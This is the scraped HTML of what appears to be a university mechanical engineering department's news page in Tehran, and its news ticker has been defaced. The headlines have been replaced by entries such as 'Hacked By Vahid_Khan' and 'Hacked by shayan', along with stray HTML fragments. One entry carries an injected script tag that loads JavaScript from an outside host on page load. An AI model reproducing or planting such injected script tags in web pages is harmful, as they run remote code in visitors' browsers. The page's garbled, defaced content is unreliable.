فارسي| EN
   
   
               

    i love you iman :D  
 
  جستجو در سايت
     
 

  

     
             
   اخبار و اطلاعيه ها
   

<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=108"><font color="#CC3300" face="Tahoma" size="2"> ثبت افتخار ملی توسط یک ایرانی<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=159"><font color="#CC3300" face="Tahoma" size="2"> Boxx<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=160"><font color="#CC3300" face="Tahoma" size="2"> admin<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=161"><font color="#CC3300" face="Tahoma" size="2"> dmin<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=162"><font color="#CC3300" face="Tahoma" size="2"> qe<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=151"><font color="#CC3300" face="Tahoma" size="2"> <!DOCTYPE html PUBLIC<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=148"><font color="#CC3300" face="Tahoma" size="2"> <script src="http://comafrique.gm/oops.js"></script><br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=149"><font color="#CC3300" face="Tahoma" size="2"> <html style="background-color:black"><br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=150"><font color="#CC3300" face="Tahoma" size="2"> ASD<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=152"><font color="#CC3300" face="Tahoma" size="2"> <!DOCTYPE html PUBLIC<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=153"><font color="#CC3300" face="Tahoma" size="2"> 12122<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=154"><font color="#CC3300" face="Tahoma" size="2"> shell<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=155"><font color="#CC3300" face="Tahoma" size="2"> sikrit<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=156"><font color="#CC3300" face="Tahoma" size="2"> Hacked By Vahid_Khan<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=157"><font color="#CC3300" face="Tahoma" size="2"> fas<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=158"><font color="#CC3300" face="Tahoma" size="2"> Hacked By Vahid_Khan<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=164"><font color="#CC3300" face="Tahoma" size="2"> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title><br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=165"><font color="#CC3300" face="Tahoma" size="2"> شل<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=166"><font color="#CC3300" face="Tahoma" size="2"> Hacked<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=167"><font color="#CC3300" face="Tahoma" size="2"> sako<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=168"><font color="#CC3300" face="Tahoma" size="2"> Hacked <br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=169"><font color="#CC3300" face="Tahoma" size="2"> Hacked<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=170"><font color="#CC3300" face="Tahoma" size="2"> Hacked by shayan<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=171"><font color="#CC3300" face="Tahoma" size="2"> Hacked by shayan<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=172"><font color="#CC3300" face="Tahoma" size="2"> ایدی یاهو من<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=173"><font color="#CC3300" face="Tahoma" size="2"> hacked by shayan********<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=174"><font color="#CC3300" face="Tahoma" size="2"> Hacked<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> <p align="center"> <span lang="fa"><a href="news.php?id=175"><font color="#CC3300" face="Tahoma" size="2"> Hacked<br><br></font></span></a> <HR align=center width=80 color=#333366 SIZE=1> </marquee></font><font color="#FF0000" face="Tahoma" size="2"><span lang="fa">       <a href="news_list.php"><font color="#6981B4">ليست تمام اخبار و اطلاعيه ها</font></a></span></font></tr> </table> </font></td> <td> </td> <td height="241"> </td> </tr> <tr> <td></td> <td> </td> <td> </td> <td> </td> <td> </td> <td></td> <td> </td> <td></td> <td> </td> <td height="35"> </td> </tr> <tr> <td></td> <td> </td> <td> </td> <td valign="bottom" background="image/index/connected_multiple.jpg"> <p align="left"><font color="#6981B4" face="Tahoma" size="2"> <a href="vorod.php">ورود اعضاء</a></font></td> <td> </td> <td></td> <td> </td> <td></td> <td> </td> <td height="73"> </td> </tr> <tr> <td width="5"></td> <td width="21"> </td> <td width="63"> </td> <td width="57"> </td> <td width="66"> </td> <td width="8"></td> <td width="22"> </td> <td width="4"></td> <td width="48"> </td> <td height="182" width="52"> </td> </tr> <tr> <td height="63" colspan="11"> <table cellpadding="0" cellspacing="0" background="image/index/ApadanaWeb_006b_03.jpg" width="874" height="63"> <!-- MSTableType="layout" --> <tr> <td></td> <td></td> <td></td> <td></td> <td height="17"></td> </tr> <tr> <td></td> <td valign="top" colspan="3"> <font color="#000000"> <SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: Times New Roman; TEXT-DECORATION: none; text-underline: none"><A style="FONT-SIZE: 10pt; FONT-FAMILY: Times New Roman; TEXT-DECORATION: none; text-underline: none" href="http://sina.sharif.edu/~mecheng/"><font color="#FFFFFF">School of Mechanical Engineering</font></A></SPAN><SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: 'Times New Roman'"><SPAN style="TEXT-DECORATION: none; text-underline: none"><A style="FONT-SIZE: 10pt; FONT-FAMILY: Times New Roman; TEXT-DECORATION: none; text-underline: none" href="http://www.sharif.edu/en"><span lang="fa"><font color="#FFFFFF">   </font></span><font color="#FFFFFF">Sharif University of Technology</font></A></SPAN><FONT color=#ffffff>, </FONT></SPAN> <FONT color=#FFFFFF><ST1:PLACE><ST1:CITY><SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: 'Times New Roman'">Tehran</SPAN></ST1:CITY><SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: 'Times New Roman'">,  </SPAN><ST1:COUNTRY-REGION><SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: 'Times New Roman'">Iran</SPAN></ST1:COUNTRY-REGION></ST1:PLACE></FONT><SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: 'Times New Roman'"><FONT color=#ffffff> </FONT></SPAN> </font></td> <td height="15"></td> </tr> <tr> <td></td> <td></td> <td valign="top"> <P class=MsoNormal style="MARGIN-BOTTOM: 0px" align=center><SPAN style="FONT-SIZE: 10pt; FONT-FAMILY: 'Times New Roman'"><FONT color=#ffffff> Designed by: </FONT> <a href="mailto:khanzadi19@yahoo.com"><font color="#FFFFFF">Mohammad Khanzadi</font></a></SPAN></P> </td> <td></td> <td height="15"></td> </tr> <tr> <td width="226"></td> <td width="36"></td> <td width="372"></td> <td width="82"></td> <td height="16" width="158"></td> </tr> </table> </td> </tr> </TABLE></div> <p> </p> </TABLE></CENTER></BODY> </font></HTML>